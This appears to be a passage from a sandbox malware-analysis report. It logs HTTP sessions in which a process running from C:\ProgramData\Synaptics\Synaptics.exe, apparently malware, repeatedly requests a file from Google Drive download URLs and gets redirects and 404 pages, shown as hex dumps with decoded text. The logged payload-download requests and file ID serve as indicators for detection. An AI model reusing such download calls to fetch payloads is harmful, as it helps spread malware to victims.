                                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="R-73Ssp20gV7rKqIi0X8ug">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                              2024-12-30 10:48:15 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              46192.168.2.449816142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:14 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:15 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC7iEh9I2GjWkEOztXkzkC3wOejI9a1hrVZGdvSiOtIrgoh1c_a5dCwoN5nqNFWIBn8MpDvsy0A
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:15 GMT
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-v3jSaI0PEqg8J-aeKWIxSw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:15 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                              2024-12-30 10:48:15 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 52 32 53 71 50 32 55 4b 50 41 79 77 43 5a 75 6e 6a 53 6f 31 6d 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="R2SqP2UKPAywCZunjSo1mw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                              2024-12-30 10:48:15 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              47192.168.2.449818142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:15 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=Lg--Z3MNSR6dPItDRtKtP1r9cxxvxAnqX_seVCI6-qswVZogoBMsy20UdoyvolgY4jsXxa03MypjCddOfLfnmlLI7lN7IlZduEZIatbBpXtzPJ8etFv4N6IpLm-XEEoTbE_64lHHATt3pCnDxEKnJ_69QRAFEoyKi-Yzj7JKmhP1M6ERhD7W0_8
                                                                                                                              2024-12-30 10:48:15 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:15 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-hCizBcOzcMxE19vejk-dkA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              48192.168.2.449819142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:15 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=Lg--Z3MNSR6dPItDRtKtP1r9cxxvxAnqX_seVCI6-qswVZogoBMsy20UdoyvolgY4jsXxa03MypjCddOfLfnmlLI7lN7IlZduEZIatbBpXtzPJ8etFv4N6IpLm-XEEoTbE_64lHHATt3pCnDxEKnJ_69QRAFEoyKi-Yzj7JKmhP1M6ERhD7W0_8
                                                                                                                              2024-12-30 10:48:16 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:16 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-ztGuTwcSKUDUngiYH36BmQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              49192.168.2.449820142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:15 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:16 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC6Sh3xgX3PnWXIxgDXVZGPUTETmykNQonjEVaUITFD2Sgxy7xZztKc1SjQzvHL4wBcG
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:16 GMT
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-JZd43chUa4-61S2n-irduQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:16 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                              2024-12-30 10:48:16 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 70 70 6a 45 71 63 46 34 31 67 32 39 4a 63 36 4d 74 6e 72 39 59 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                              Data Ascii: t Found)!!1</title><style nonce="ppjEqcF41g29Jc6Mtnr9Yg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                              2024-12-30 10:48:16 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              50192.168.2.449822142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:16 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:16 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC5d5hQrEWS9zgfZ4YwsGyZU1IPO-KAUM16kqCcIyKYsD0WO4ZwQxBgAFZmRvJlV-T2QbEvjtYc
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:16 GMT
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-M3RW1lfUJdiT3RA1mDtDPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:16 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                              2024-12-30 10:48:16 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 79 77 6a 49 77 44 66 49 72 48 67 7a 64 33 31 6e 5a 2d 34 71 42 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="ywjIwDfIrHgzd31nZ-4qBA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                              2024-12-30 10:48:16 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              51192.168.2.449826142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:16 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=Lg--Z3MNSR6dPItDRtKtP1r9cxxvxAnqX_seVCI6-qswVZogoBMsy20UdoyvolgY4jsXxa03MypjCddOfLfnmlLI7lN7IlZduEZIatbBpXtzPJ8etFv4N6IpLm-XEEoTbE_64lHHATt3pCnDxEKnJ_69QRAFEoyKi-Yzj7JKmhP1M6ERhD7W0_8
                                                                                                                              2024-12-30 10:48:16 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:16 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-LxKpNJxuAbv1q_EerSUvtQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              52192.168.2.449827142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:17 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=Lg--Z3MNSR6dPItDRtKtP1r9cxxvxAnqX_seVCI6-qswVZogoBMsy20UdoyvolgY4jsXxa03MypjCddOfLfnmlLI7lN7IlZduEZIatbBpXtzPJ8etFv4N6IpLm-XEEoTbE_64lHHATt3pCnDxEKnJ_69QRAFEoyKi-Yzj7JKmhP1M6ERhD7W0_8
                                                                                                                              2024-12-30 10:48:17 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:17 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-gOdT66KTXAckK6IgwZ6RMw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              53192.168.2.449828142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
